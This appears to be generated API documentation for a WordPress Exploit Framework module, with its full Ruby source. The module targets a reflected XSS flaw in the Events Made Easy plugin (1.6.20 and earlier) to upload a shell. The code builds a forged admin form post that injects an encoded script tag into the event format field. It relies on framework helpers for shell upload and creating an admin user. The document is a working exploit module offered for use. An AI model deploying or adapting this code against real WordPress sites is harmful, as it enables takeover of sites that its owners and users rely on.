Class: Wpxf::Exploit::EventsMadeEasyReflectedXssShellUpload

Inherits:
Module
  • Object
show all
Includes:
WordPress::StagedReflectedXss
Defined in:
lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::StagedReflectedXss

#create_basic_post_script, #initial_req_path, #on_http_request, #run, #url_with_xss

Methods included from WordPress::ReflectedXss

#run

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeEventsMadeEasyReflectedXssShellUpload

Returns a new instance of EventsMadeEasyReflectedXssShellUpload.



6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 
# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 6

def initialize
  super

  update_info(
    name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload',
    author: [
      'Job Diesveld', # Discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '8595'],
      ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html']
    ],
    date: 'Aug 04 2016'
  )

  register_option(
    IntegerOption.new(
      name: 'event_id',
      desc: 'A valid event ID (can be found in the URL of an event page)',
      required: true
    )
  )
end

Instance Method Details

#checkObject 



31
32
33
 
# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 31

def check
  check_plugin_version_from_readme('events-made-easy', '1.6.21')
end

#event_idObject 



35
36
37
 
# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 35

def event_id
  normalized_option_value('event_id')
end

#form_fieldsObject 



47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
 
# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 47

def form_fields
  {
    'event_status' => [1, 2, 5].sample,
    'event_contactperson_id' => -1,
    'event_seats' => 0,
    'price' => 0,
    'currency' => 'EUR',
    'eme_prop_max_allowed' => Utility::Text.rand_numeric(2),
    'eme_prop_min_allowed' => Utility::Text.rand_numeric(1),
    'eme_prop_rsvp_discount' => '',
    'eme_prop_rsvp_discountgroup' => '',
    'rsvp_number_days' => Utility::Text.rand_numeric(1),
    'rsvp_number_hours' => Utility::Text.rand_numeric(1),
    'eme_prop_rsvp_end_target' => 'start',
    'event_name' => Utility::Text.rand_alphanumeric(10),
    'event_slug' => Utility::Text.rand_alphanumeric(10),
    'localised_recurrence_date' => Time.now.strftime('%d/%m/%Y'),
    'recurrence_start_date' => Time.now.strftime('%Y-%m-%d'),
    'localised_recurrence_end_date' => Time.now.strftime('%d/%m/%Y'),
    'recurrence_end_date' => Time.now.strftime('%Y-%m-%d'),
    'recurrence_freq' => ['daily', 'weekly', 'monthly'].sample,
    'recurrence_interval' => '',
    'recurrence_byweekno' => 1,
    'recurrence_byday' => 1,
    'localised_event_start_date' => Time.now.strftime('%d/%m/%Y'),
    'event_start_date' => Time.now.strftime('%Y-%m-%d'),
    'localised_event_end_date' => Time.now.strftime('%d/%m/%Y'),
    'event_end_date' => Time.now.strftime('%Y-%m-%d'),
    'event_start_time' => Time.now.strftime('%I:%M%p'),
    'event_end_time' => Time.now.strftime('%I:%M%p'),
    'eme_prop_event_page_title_format_tpl' => 0,
    'event_page_title_format' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_single_event_format_tpl' => 0,
    'event_single_event_format' => "<script>#{xss_ascii_encoded_include_script}<\\/script>",
    'eme_prop_event_contactperson_email_body_tpl' => 0,
    'event_contactperson_email_body' => '',
    'eme_prop_event_registration_recorded_ok_html_tpl' => 0,
    'event_registration_recorded_ok_html' => '',
    'eme_prop_event_respondent_email_body_tpl' => 0,
    'event_respondent_email_body' => '',
    'eme_prop_event_registration_pending_email_body_tpl' => 0,
    'event_registration_pending_email_body' => '',
    'eme_prop_event_registration_updated_email_body_tpl' => 0,
    'event_registration_updated_email_body' => '',
    'eme_prop_event_registration_cancelled_email_body_tpl' => 0,
    'event_registration_cancelled_email_body' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_registration_denied_email_body_tpl' => 0,
    'event_registration_denied_email_body' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_registration_form_format_tpl' => 0,
    'event_registration_form_format' => '',
    'eme_prop_event_cancel_form_format_tpl' => 0,
    'event_cancel_form_format' => '',
    'location_name' => Utility::Text.rand_alphanumeric(5),
    'location_address' => Utility::Text.rand_alphanumeric(5),
    'location_town' => Utility::Text.rand_alphanumeric(5),
    'location_latitude' => '',
    'location_longitude' => '',
    'content' => Utility::Text.rand_alphanumeric(10),
    'event_image_url' => '',
    'event_image_id' => '',
    'event_url' => '',
    'event_update_button' => ''
  }
end

#initial_scriptObject 



43
44
45
 
# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 43

def initial_script
  create_basic_post_script(vulnerable_url, form_fields)
end

#vulnerable_urlObject 



39
40
41
 
# File 'lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb', line 39

def vulnerable_url
  normalize_uri(wordpress_url_admin, "admin.php?page=events-manager&eme_admin_action=update_event&event_id=#{event_id}")
end